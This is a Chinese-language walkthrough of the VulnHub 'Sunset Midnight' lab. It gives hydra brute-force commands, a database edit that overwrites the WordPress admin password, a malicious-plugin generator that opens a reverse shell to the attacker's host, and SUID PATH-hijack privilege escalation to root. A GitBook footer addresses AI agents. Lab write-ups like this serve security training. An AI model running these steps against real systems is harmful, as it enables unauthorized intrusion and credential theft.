> For the complete documentation index, see [llms.txt](https://icybersec.gitbook.io/cybersecuritynote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://icybersec.gitbook.io/cybersecuritynote/ba-chang-huan-jing/vulnhub/sunset-midnight.md). # SUNSET MIDNIGHT > 靶场IP:`192.168.2.4` 扫描对外端口 ``` ┌──(root㉿kali)-[~/Desktop] └─# nmap -p1-65535 -sV 192.168.2.4 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 07:13 EDT Nmap scan report for 192.168.2.4 Host is up (0.000080s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 MAC Address: 08:00:27:05:08:38 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds ``` 浏览器访问80端口,发现配置本地hosts ![image-20220904191517941](/files/ghheTsAVQjz2c7IQho1l) ``` ┌──(root㉿kali)-[~/Desktop] └─# cat /etc/hosts 192.168.2.4 sunset-midnight ``` ![image-20220904191627991](/files/gEXDlViCfDXi5QeBzvYc) 对wordpress进行暴力破解,发现无法爆破。 ``` hydra -L users.txt -P /usr/share/wordlists/rockyou.txt sunset-midnight -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 64 ``` 于是爆破MySQL端口,找到账号密码:`root/robert` ``` ┌──(root㉿kali)-[/tmp] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 08:43:20 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://sunset-midnight:3306/ [3306][mysql] host: sunset-midnight login: root password: robert 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 08:43:21 ``` ![image-20220904204449398](/files/skhX4CzPpQZ6OzdCg78R) 查询wordpress的后台登录密码 ![image-20220904204533158](/files/r0XeYg1ca5sqsoncnk60) 不过无法破解到密码,于是直接更改密码的哈希的密码为`password`。 ``` MariaDB [wordpress_db]> update wp_users set user_pass="5f4dcc3b5aa765d61d8327deb882cf99" WHERE ID=1; Query OK, 1 row affected (0.003 sec) Rows matched: 1 Changed: 1 Warnings: 0 ``` 登录wordpress后台 ![image-20220904204812696](/files/4dqSncpIABDFLQYrRu6S) 在插件添加一句话木马 ``` ``` ![image-20220904204946646](/files/shknAeAMRDL0uu4RFaln) 但是无法保存成功。 ![image-20220904205104164](/files/kGTjzCUXLG5ODRascYr6) 使用WordPress 木马插件 > ``` ┌──(root㉿kali)-[/opt/malicious-wordpress-plugin] └─# python wordpwn.py 192.168.2.5 8888 Y [*] Checking if msfvenom installed [+] msfvenom installed [+] Generating plugin script [+] Writing plugin script to file [+] Generating payload To file ``` ![QQ录屏20220904205517](/files/wHQdXLEHZzJnIHdVNjNs) 访问:`http://sunset-midnight/wp-content/plugins/malicious/wetw0rk_maybe.php`,即可连接反弹shell > 或者`/wp-content/plugins/malicious/QwertyRocks.php` ![image-20220904205914558](/files/1MZTDaItWvSC0knm10zh) 查看`wp-config.php` ``` define( 'DB_NAME', 'wordpress_db' ); /** MySQL database username */ define( 'DB_USER', 'jose' ); /** MySQL database password */ define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); ``` 切换到`jose`用户 ![image-20220904210456110](/files/B6CmjayQTZnp7bxX6EKV) 查找suid ``` jose@midnight:~$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/bin/su /usr/bin/sudo /usr/bin/status /usr/bin/chfn /usr/bin/passwd /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/mount /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign ``` 提权 ``` jose@midnight:~$ /usr/bin/status /usr/bin/status sh: 1: service: not found jose@midnight:~$ cd /tmp cd /tmp jose@midnight:/tmp$ nano service nano service Error opening terminal: unknown. jose@midnight:/tmp$ jose@midnight:/tmp$ echo '/bin/sh' >> service echo '/bin/sh' >> service jose@midnight:/tmp$ export PATH=$PATH:/tmp export PATH=$PATH:/tmp jose@midnight:/tmp$ /usr/bin/status /usr/bin/status sh: 1: service: Permission denied Status of the SSH server:jose@midnight:/tmp$ jose@midnight:/tmp$ chmod +x service chmod +x service jose@midnight:/tmp$ /usr/bin/status /usr/bin/status # id id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose) ``` 查看flag ![image-20230208160628254](/files/JGaX4skEc19iMj3FYrHq) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://icybersec.gitbook.io/cybersecuritynote/ba-chang-huan-jing/vulnhub/sunset-midnight.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.